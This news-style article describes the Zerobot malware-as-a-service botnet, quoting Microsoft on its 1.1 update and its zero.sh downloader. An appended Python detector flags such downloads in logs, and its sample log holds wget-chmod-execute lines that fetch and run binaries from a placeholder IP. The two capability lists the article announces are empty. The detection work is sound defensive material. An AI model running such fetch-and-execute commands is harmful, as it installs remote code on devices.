If you’re unfamiliar with Zerobot, it is a botnet that spreads across web applications and IoT devices by exploiting vulnerabilities. It is offered as malware as a service, which means it evolves over time. In fact, the Microsoft Defender for IoT security team says the botnet has been updated multiple times since the team began tracking it.

Malware as a service is a relatively new concept in the cybercrime world. It gives threat actors easy access to established malware packages and ready-made tools for their attacks. In other words, it opens up cyberattack activity to people who may not have the skill to build attacks themselves.

Microsoft points out that Zerobot is a defining example of malware as a service and is constantly evolving and improving. This includes version 1.1 of the botnet:

“Zerobot 1.1, including newly identified capabilities and further context to Fortinet’s recent analysis on the threat. Zerobot 1.1 increases its capabilities with the inclusion of new attack methods and new exploits for supported architectures, expanding the malware’s reach to different types of devices.”

Evolving

This means the botnet is better than ever at infiltrating IoT devices such as cameras, routers, and others. It places compromised hardware onto a distributed denial of service (DDoS) botnet. Because it has access to multiple modules, Zerobot can tailor its attacks to target different types of architecture and operating systems.

“Upon gaining device access, Zerobot injects a malicious payload, which may be a generic script called zero.sh that downloads and attempts to execute Zerobot, or a script that downloads the Zerobot binary of a specific architecture. The bash script that attempts to download different Zerobot binaries tries to identify the architecture by brute-force, attempting to download and execute binaries of various architectures until it succeeds, as IoT devices are based on many computer processing units (CPUs). Microsoft has observed scripts targeting various architectures including ARM64, MIPS, and x86_64.”

In its blog post, Microsoft details new capabilities it has observed from Zerobot 1.1:

The following are the previously known Zerobot capabilities:

Previously undisclosed and new capabilities are the following:
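The download behaviour Microsoft describes (a fetch of zero.sh, or one device pulling binaries for several architectures in quick succession) can be turned into a simple detection over command-line logs. The following is an added example, not code from Microsoft or from this article; the log format, file names, hosts, extra architecture tokens and thresholds are assumptions.

```python
import re
from collections import defaultdict

DOWNLOADERS = {"wget", "curl", "tftp"}
# ARM64, MIPS and x86_64 come from the article; the other tokens are assumptions.
ARCH_RE = re.compile(r"(arm64|aarch64|armv7|mipsel|mips|x86_64|i686|ppc)", re.I)

def fetched_names(cmdline):
    """Yield basenames of files requested by download tools in a command line."""
    for segment in re.split(r";|&&|\|\|", cmdline):
        words = segment.split()
        if words and words[0].rsplit("/", 1)[-1] in DOWNLOADERS:
            for w in words[1:]:
                if not w.startswith("-") and ("/" in w or "." in w):
                    yield w.rstrip("/").rsplit("/", 1)[-1]

def find_arch_bruteforce(lines, min_archs=3, window=120):
    """Return {host: reasons}; min_archs and window (seconds) are assumed thresholds."""
    seen = defaultdict(list)    # host -> [(timestamp, architecture)]
    alerts = defaultdict(set)
    for line in lines:
        ts, host, cmd = line.split(" ", 2)
        for name in fetched_names(cmd):
            if name == "zero.sh":
                alerts[host].add("fetched zero.sh")
            m = ARCH_RE.search(name)
            if m:
                seen[host].append((int(ts), m.group(1).lower()))
    for host, events in seen.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            archs = {a for t, a in events[i:] if t - start <= window}
            if len(archs) >= min_archs:
                alerts[host].add("multi-arch fetch: " + ",".join(sorted(archs)))
                break
    return {h: sorted(r) for h, r in alerts.items()}

# Constructed sample log, "<epoch> <host> <command line>"; all names and addresses are made up.
SAMPLE = [
    "1700000000 cam-01 wget http://192.0.2.10/sample.arm64; chmod +x sample.arm64; ./sample.arm64",
    "1700000004 cam-01 wget http://192.0.2.10/sample.mips; chmod +x sample.mips; ./sample.mips",
    "1700000009 cam-01 wget http://192.0.2.10/sample.x86_64; chmod +x sample.x86_64; ./sample.x86_64",
    "1700000100 rtr-02 curl -O http://192.0.2.10/zero.sh",
    "1700000200 nas-03 wget https://example.org/firmware-x86_64.tar.gz",
]

if __name__ == "__main__":
    for host, reasons in find_arch_bruteforce(SAMPLE).items():
        print(host, reasons)
```

A single architecture-tagged download, such as the firmware fetch on nas-03, stays below the threshold and is not flagged.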
